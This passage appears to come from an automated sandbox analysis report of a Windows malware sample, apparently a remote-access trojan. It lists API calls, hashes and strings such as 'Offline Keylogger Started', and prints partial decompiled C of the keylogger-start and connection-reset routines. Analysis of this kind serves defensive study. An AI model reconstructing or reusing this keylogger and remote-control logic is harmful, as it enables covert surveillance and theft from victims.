                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,00018C06), ref: 00402302
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                                                                • CreateThread.KERNELBASE(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402389
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402392
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,00018C06), ref: 004023A7
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3745950881-0
                                                                                • Opcode ID: dbeee884fd776cfbec01fd867003cada5b731346b54ac5527932367327d62816
                                                                                • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                                                                • Opcode Fuzzy Hash: dbeee884fd776cfbec01fd867003cada5b731346b54ac5527932367327d62816
                                                                                • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402440, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                • #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024BB
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                                                                • #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024FF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                                                                • String ID: [DataStart]
                                                                                • API String ID: 2152988250-3852763199
                                                                                • Opcode ID: b7ddc22c15d8914d1f1c813683a48672bd5c42295628cced952c29d7fd2a43a5
                                                                                • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                                                                • Opcode Fuzzy Hash: b7ddc22c15d8914d1f1c813683a48672bd5c42295628cced952c29d7fd2a43a5
                                                                                • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409D3C, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 102sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                                                                  • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                                                                  • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                                                                  • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                                                                • Sleep.KERNELBASE(00000BB8), ref: 00409DFA
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                                                                • exit.MSVCRT ref: 00409E77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                                                                • String ID: 2.7.2 Pro$override$pth_unenc
                                                                                • API String ID: 3602623569-3893205188
                                                                                • Opcode ID: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                                                                • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                                                                • Opcode Fuzzy Hash: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                                                                • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004129EB, Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00018C06), ref: 00412A90
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                                                                • String ID:
                                                                                • API String ID: 3435050692-0
                                                                                • Opcode ID: 6fc9868ad885f7efbe2d5dc381eda5900ba348297c01df250700560d4c3f1b65
                                                                                • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                                                                • Opcode Fuzzy Hash: 6fc9868ad885f7efbe2d5dc381eda5900ba348297c01df250700560d4c3f1b65
                                                                                • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405180, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 26%
                                                                                			E00405180(void* __ecx, char _a4) {
				char _v5;
				char _v6;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t32;
				char* _t33;
				void* _t36;

				_t19 = __ecx;
				 *((char*)(__ecx + 0x3c)) = 1;
				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
				E00405156(__ecx);
				_t33 = "Offline Keylogger Started";
				if( *0x41b154 != 0x32) {
					_t36 = _t36 - 0x10;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
					E00405DD3(__ecx);
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
				E0041203B();
				CreateThread(0, 0, E0040528A, _t19, 0, 0); // executed
				if( *_t19 == 0) {
					CreateThread(0, 0, E0040526A, _t19, 0, 0); // executed
				}
				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0); // executed
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}












                                                                                0x00405185
                                                                                0x00405190
                                                                                0x00405194
                                                                                0x0040519c
                                                                                0x004051a8
                                                                                0x004051ad
                                                                                0x004051af
                                                                                0x004051b9
                                                                                0x004051c1
                                                                                0x004051c1
                                                                                0x004051d0
                                                                                0x004051e4
                                                                                0x004051ea
                                                                                0x00405204
                                                                                0x00405208
                                                                                0x00405214
                                                                                0x00405214
                                                                                0x00405220
                                                                                0x00405225
                                                                                0x0040522f

                                                                                APIs
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00017838,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                                                                  • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                                                                  • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                  • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                  • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                  • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                                                                  • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                  • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                  • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                  • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                                                                • CreateThread.KERNELBASE(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                                                                • CreateThread.KERNELBASE(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                                                                • CreateThread.KERNELBASE(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                                                                • String ID: Offline Keylogger Started$[INFO]
                                                                                • API String ID: 2375278975-3749928830
                                                                                • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                                                                • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                                                                • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                                                                • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004027B1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62sleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 44%
                                                                                			E004027B1(void* __ecx) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				void* _v56;
				char* _t29;
				char* _t30;
				void* _t38;
				intOrPtr _t46;

				_t38 = __ecx;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
					L3:
					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {
						_t46 =  *0x41bcac; // 0x0
						if(_t46 != 0) {
							GetLocalTime( &_v24);
							_t29 =  &_v5;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
							_t30 =  &_v40;
							L00414170();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
							_t21 = printf(_t30);
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						E004020F4(_t21, _t38);
					}
					L7:
					 *((char*)(_t38 + 0x38)) = 0;
					 *((char*)(_t38 + 0x39)) = 0;
					return 0;
				}
				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
					Sleep(0x3e8); // executed
					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
					_t21 =  *(_t38 + 0x40);
					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
						continue;
					}
					goto L3;
				}
				goto L7;
			}











                                                                                0x004027b9
                                                                                0x004027c0
                                                                                0x004027c3
                                                                                0x004027e4
                                                                                0x004027e7
                                                                                0x004027e9
                                                                                0x004027ef
                                                                                0x004027f5
                                                                                0x00402812
                                                                                0x00402820
                                                                                0x00402827
                                                                                0x0040282b
                                                                                0x00402835
                                                                                0x0040283c
                                                                                0x00402848
                                                                                0x00402851
                                                                                0x00402851
                                                                                0x00402859
                                                                                0x00402859
                                                                                0x0040285e
                                                                                0x0040285e
                                                                                0x00402861
                                                                                0x00402869
                                                                                0x00402869
                                                                                0x004027c5
                                                                                0x004027d3
                                                                                0x004027d9
                                                                                0x004027dc
                                                                                0x004027e2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004027e2
                                                                                0x00000000

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000003E8), ref: 004027D3
                                                                                • GetLocalTime.KERNEL32(?), ref: 004027F5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 00402820
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040282B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402835
                                                                                • printf.MSVCRT ref: 0040283C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402848
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402851
                                                                                Strings
                                                                                • Timeout expired, resetting connection., xrefs: 00402815
                                                                                • %02i:%02i:%02i:%03i [WARNING] , xrefs: 0040281B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
